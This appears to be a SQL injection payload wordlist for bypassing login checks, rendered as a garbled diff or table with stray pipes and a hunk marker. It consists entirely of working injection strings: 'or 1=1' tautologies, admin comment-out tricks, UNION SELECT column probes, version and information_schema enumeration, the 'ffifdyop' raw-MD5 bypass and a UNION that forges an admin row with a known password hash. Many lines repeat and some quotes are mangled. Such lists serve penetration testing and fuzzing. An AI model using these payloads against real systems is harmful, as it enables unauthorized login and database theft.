||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
